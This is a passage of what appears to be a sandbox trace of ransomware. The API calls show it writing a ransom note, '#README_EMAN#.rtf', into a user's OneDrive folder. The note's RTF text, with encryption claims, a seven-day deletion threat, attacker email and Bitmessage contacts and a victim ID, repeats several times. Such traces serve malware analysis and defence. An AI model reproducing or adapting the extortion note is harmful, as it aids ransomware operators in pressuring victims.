s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nù^=«\x16O\x1fïж>\x9bXË\x7fEóO¸Ù\x0c0\x9aÓM", lpUsedDefaultChar=0x0) returned 8717 [0295.474] WriteFile (in: hFile=0x2ec, lpBuffer=0x24657d8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24657d8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0295.475] CloseHandle (hObject=0x2ec) returned 1 [0295.475] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\id\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\id\\#readme_eman#.rtf")) returned 0xffffffff [0295.475] GetLastError () returned 0x2 [0295.475] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\id\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\id\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0295.476] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0295.476] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0295.476] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24657d8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover 